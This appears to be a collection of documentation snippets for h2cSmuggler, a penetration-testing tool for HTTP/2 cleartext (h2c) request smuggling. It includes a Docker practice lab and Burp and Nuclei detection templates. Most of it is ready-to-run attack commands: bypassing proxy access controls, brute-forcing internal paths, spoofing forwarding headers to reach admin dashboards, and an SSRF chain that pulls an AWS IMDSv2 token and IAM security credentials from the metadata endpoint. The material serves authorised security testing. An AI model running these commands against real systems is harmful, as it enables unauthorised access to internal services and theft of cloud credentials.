### Initialize test environment Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Generate necessary certificates and start the docker-compose test environment. ```bash # Generate certs ./configs/generate-certificates.sh # Activate services docker-compose up ``` -------------------------------- ### Start Docker Test Environment Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Start the local Docker environment using docker-compose to practice h2c smuggling with vulnerable proxy configurations. ```bash docker-compose up ``` -------------------------------- ### Install h2cSmuggler dependencies Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Install the required hyper-h2 library using pip. ```sh pip3 install h2 ``` -------------------------------- ### Generate SSL Certificates for Test Environment Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Generate SSL certificates required for setting up the local Docker test environment for h2c smuggling practice. ```bash ./configs/generate-certificates.sh ``` -------------------------------- ### Run h2cSmuggler scan and test Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Commands to execute bulk scans using a list of URLs or perform an individual test on a specific endpoint. ```bash ./h2csmuggler.py --scan-list urls.txt --threads 5 ``` ```bash ./h2csmuggler.py -x https://www.example.com/api/ --test ``` -------------------------------- ### h2cSmuggler Usage Syntax Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Displays the command-line usage for h2cSmuggler, outlining all available arguments and their purposes. Use this to understand the tool's capabilities and options. ```sh usage: h2csmuggler.py [-h] [--scan-list SCAN_LIST] [--threads THREADS] [--upgrade-only] [-x PROXY] [-i WORDLIST] [-X REQUEST] [-d DATA] [-H HEADER] [-m MAX_TIME] [-t] [-v] [url] Detect and exploit insecure forwarding of h2c upgrades. positional arguments: url optional arguments: -h, --help show this help message and exit --scan-list SCAN_LIST list of URLs for scanning --threads THREADS # of threads (for use with --scan-list) --upgrade-only drop HTTP2-Settings from outgoing Connection header -x PROXY, --proxy PROXY proxy server to try to bypass -i WORDLIST, --wordlist WORDLIST list of paths to bruteforce -X REQUEST, --request REQUEST smuggled verb -d DATA, --data DATA smuggled data -H HEADER, --header HEADER smuggled headers -m MAX_TIME, --max-time MAX_TIME socket timeout in seconds (type: float; default 10) -t, --test test a single proxy server -v, --verbose ``` -------------------------------- ### Scan List with Upgrade-Only Mode Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Scan a list of URLs for h2c smuggling vulnerabilities using upgrade-only mode and multiple threads. ```bash ./h2csmuggler.py --scan-list urls.txt --threads 5 --upgrade-only ``` -------------------------------- ### Test HAProxy Endpoint Access Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Test the HAProxy endpoint in the Docker environment. Access should be denied, resulting in a 403 Forbidden response. ```bash curl -k https://localhost:8001/flag ``` -------------------------------- ### Test Single Endpoint for h2c Upgrade Support Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Quickly verify if an individual proxy endpoint forwards h2c upgrade requests to a backend server. Use verbose output for debugging and specify a custom timeout if needed. ```bash # Test a single endpoint for h2c upgrade support ./h2csmuggler.py -x https://www.example.com/api/ --test # Test with verbose output for debugging ./h2csmuggler.py -x https://www.example.com/api/ --test --verbose # Test with custom timeout (in seconds) ./h2csmuggler.py -x https://www.example.com/api/ --test --max-time 15 # Example successful output: # [INFO] h2c stream established successfully. # [INFO] Success! https://www.example.com/api/ can be used for tunneling ``` -------------------------------- ### Test h2c Upgrade-Only Mode Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Test for servers that accept h2c upgrades without the HTTP2-Settings header using the --upgrade-only flag. ```bash ./h2csmuggler.py -x https://edgeserver --upgrade-only --test ``` -------------------------------- ### Define target URLs for scanning Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md A text file containing a list of URLs to be tested for h2c smuggling vulnerabilities. ```text https://www.example.com/ https://www.example.com/api/ https://www.example.com/auth/ https://www.example.com/admin/ https://www.example.com/payments/ ...omitted for brevity... ``` -------------------------------- ### Test nginx Endpoint with h2cSmuggler Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Test the nginx endpoint in the Docker environment for h2c smuggling vulnerabilities. ```bash ./h2csmuggler.py -x https://localhost:8002/ --test ``` ```bash ./h2csmuggler.py -x https://localhost:8002/ http://localhost/flag ``` -------------------------------- ### Brute-Force Internal Endpoints via h2c Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Uses HTTP/2 multiplexing to brute-force internal endpoints. Requires a proxy, a wordlist of paths, and the target URL. ```sh /h2csmuggler.py -x https://edgeserver -i dirs.txt http://localhost/ ``` -------------------------------- ### Test Multi-Layer Proxy Chain Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Test h2c smuggling against a multi-layer proxy chain (Nuster -> HAProxy) exposed on port 8003. ```bash ./h2csmuggler.py -x https://localhost:8003/ http://localhost/flag ``` -------------------------------- ### Access Internal Services with h2cSmuggler Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Use h2cSmuggler to access internal services on common internal IP addresses by smuggling requests through an edge server. ```bash ./h2csmuggler.py -x https://edgeserver http://192.168.1.1/admin ``` ```bash ./h2csmuggler.py -x https://edgeserver http://10.0.0.1:8080/internal ``` -------------------------------- ### Brute-Force Internal Paths via h2c Smuggling Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Efficiently brute-force internal endpoints using HTTP/2 multiplexing through a vulnerable proxy. Supports custom HTTP verbs for brute-forcing. ```bash # Create a wordlist of paths to brute-force cat > dirs.txt << 'EOF' /api/ /admin/ /internal/ /debug/ /metrics/ /health/ /config/ /swagger/ EOF # Brute-force internal endpoints using path wordlist ./h2csmuggler.py -x https://edgeserver -i dirs.txt http://localhost/ # Brute-force with custom HTTP verb ./h2csmuggler.py -x https://edgeserver -i dirs.txt -X POST http://backend/ # Example output shows each path attempted: # [INFO] h2c stream established successfully. # [INFO] Requesting - /api/ # :status: 200 # [INFO] Requesting - /admin/ # :status: 403 # [INFO] Requesting - /internal/ # :status: 200 ``` -------------------------------- ### Burp Suite Extension for h2c Smuggling Source: https://context7.com/bishopfox/h2csmuggler/llms.txt The Burp Suite extension performs active scanning to detect h2c smuggling vulnerabilities. It reports high severity issues when a 101 Switching Protocols response is received. ```python # Installation: # 1. Open Burp Suite # 2. Go to Extender > Extensions > Add # 3. Select "Python" as extension type # 4. Load: extensions/BurpExtension/h2cSmugglingCheck.py # The extension automatically: # - Performs active scanning on each endpoint # - Sends requests with h2c upgrade headers # - Reports "High" severity issues when 101 Switching Protocols is received # - Reports "Certain" confidence for HTTPS, "Tentative" for HTTP # Two test variants are performed: # 1. Connection: Upgrade, HTTP2-Settings (standard h2c) # 2. Connection: Upgrade (upgrade-only variant) ``` -------------------------------- ### Exploit with Upgrade-Only Mode Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Exploit h2c smuggling vulnerabilities using the upgrade-only mode to target backend internal endpoints. ```bash ./h2csmuggler.py -x https://edgeserver --upgrade-only http://backend/internal/endpoint ``` -------------------------------- ### Bypass HAProxy Restriction with h2cSmuggler Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Use h2cSmuggler to bypass access restrictions on the HAProxy endpoint and retrieve the flag. ```bash ./h2csmuggler.py -x https://localhost:8001/ http://localhost/flag ``` -------------------------------- ### Scan URLs for h2c Vulnerability Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Scan multiple URLs to identify proxy endpoints susceptible to h2c smuggling. The tool tests for a '101 Switching Protocols' response. Redirect output to separate files for errors and results. ```bash # Create a list of URLs to scan cat > urls.txt << 'EOF' https://www.example.com/ https://www.example.com/api/ https://www.example.com/auth/ https://www.example.com/admin/ https://www.example.com/payments/ EOF # Scan multiple URLs with threading ./h2csmuggler.py --scan-list urls.txt --threads 5 # Redirect output to separate files (stderr for errors, stdout for results) ./h2csmuggler.py --scan-list urls.txt --threads 5 2>errors.txt 1>results.txt # Example output for vulnerable endpoint: # [INFO] Success! https://www.example.com/api/ can be used for tunneling ``` -------------------------------- ### Exploit Host Header SSRF for AWS Metadata Token Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Retrieves an AWS metadata token by exploiting Host header SSRF over h2c smuggling. Requires specifying the proxy, request method, a custom header for TTL, and the AWS metadata endpoint. ```sh ./h2csmuggler.py -x https://edgeserver -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token ``` -------------------------------- ### Scan List of URLs for h2c Smuggling Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Scans a list of URLs to identify 'proxy_pass' endpoints susceptible to smuggling. Adjust thread counts for single-server tests. Redirects output to separate files for results and errors. ```sh ./h2csmuggler.py --scan-list urls.txt --threads 5 ``` ```sh ./h2csmuggler.py --scan-list urls.txt --threads 5 2>errors.txt 1>results.txt ``` -------------------------------- ### Nuclei Template for h2c Vulnerability Scanning Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Use the Nuclei template for automated scanning of h2c vulnerabilities. It sends requests with h2c upgrade headers and matches on HTTP 101 status codes. ```yaml # Template: extensions/nuclei-template/h2csmuggle-nuclei.yaml # Note: Requires nuclei issue #256 to be fixed for full functionality # Usage with nuclei: # nuclei -t h2csmuggle-nuclei.yaml -l targets.txt # Template sends: # GET request with headers: # Connection: Upgrade, HTTP2-Settings # Upgrade: h2c # HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA # Matches on HTTP 101 status code ``` -------------------------------- ### Smuggle Requests to Bypass Access Controls Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Tunnel HTTP/2 requests through a vulnerable proxy to access restricted backend endpoints. Supports custom HTTP methods, data payloads, and headers for various scenarios like POST requests or spoofing headers. ```bash # Access a restricted internal endpoint by smuggling through vulnerable proxy ./h2csmuggler.py -x https://edgeserver/api/ http://backend/flag # Send a POST request with JSON data to an internal API ./h2csmuggler.py -x https://edgeserver \ -X POST \ -d '{"user": 128457, "role": "admin"}' \ -H "Content-Type: application/json" \ -H "X-SYSTEM-USER: true" \ http://backend/api/internal/user/permissions # Access internal admin dashboard with spoofed headers ./h2csmuggler.py -x https://edgeserver \ -H "X-Forwarded-For: 127.0.0.1" \ -H "X-Real-IP: 172.16.0.1" \ http://backend/system/dashboard # Example output: # [INFO] h2c stream established successfully. # :status: 200 # content-type: text/plain # # [INFO] Requesting - /flag # :status: 200 # content-type: text/plain; charset=utf-8 # # You got the flag! ``` -------------------------------- ### Exploit Host Header SSRF for AWS Metadata Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Accesses AWS metadata after obtaining a token, using Host header SSRF over h2c smuggling. Requires the proxy, the obtained token in a header, and the metadata endpoint. ```sh ./h2csmuggler.py -x https://edgeserver -H "x-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/ ``` -------------------------------- ### Spoof IP Address for Internal Dashboard Access Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Spoofs IP addresses using X-Forwarded-For and X-Real-IP headers to access an internal dashboard via h2c smuggling. Requires the proxy and the target dashboard URL. ```sh ./h2csmuggler.py -x https://edgeserver -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 172.16.0.1" http://backend/system/dashboard ``` -------------------------------- ### Exploit SSRF via h2c Smuggling (AWS IMDSv2) Source: https://context7.com/bishopfox/h2csmuggler/llms.txt Leverage h2c smuggling to perform Server-Side Request Forgery attacks, specifically targeting AWS EC2 metadata endpoints (IMDSv2). This involves retrieving an IMDSv2 token and then using it to access metadata. ```bash # Step 1: Retrieve IMDSv2 token by smuggling PUT request to metadata endpoint ./h2csmuggler.py -x https://edgeserver \ -X PUT \ -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \ http://169.254.169.254/latest/api/token # Step 2: Use the token to retrieve metadata ./h2csmuggler.py -x https://edgeserver \ -H "x-aws-ec2-metadata-token: AQAEAHwN_example_token_abc123" \ http://169.254.169.254/latest/meta-data/ # Retrieve IAM credentials ./h2csmuggler.py -x https://edgeserver \ -H "x-aws-ec2-metadata-token: AQAEAHwN_example_token_abc123" \ http://169.254.169.254/latest/meta-data/iam/security-credentials/ ``` -------------------------------- ### Smuggled POST Request Past Proxy Source: https://github.com/bishopfox/h2csmuggler/blob/master/README.md Sends a smuggled POST request to an internal endpoint, bypassing a proxy server. Requires specifying the proxy, request method, data, headers, and the target URL. ```sh ./h2csmuggler.py -x https://edgeserver -X POST -d '{"user":128457 "role": "admin"}' -H "Content-Type: application/json" -H "X-SYSTEM-USER: true" http://backend/api/internal/user/permissions ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.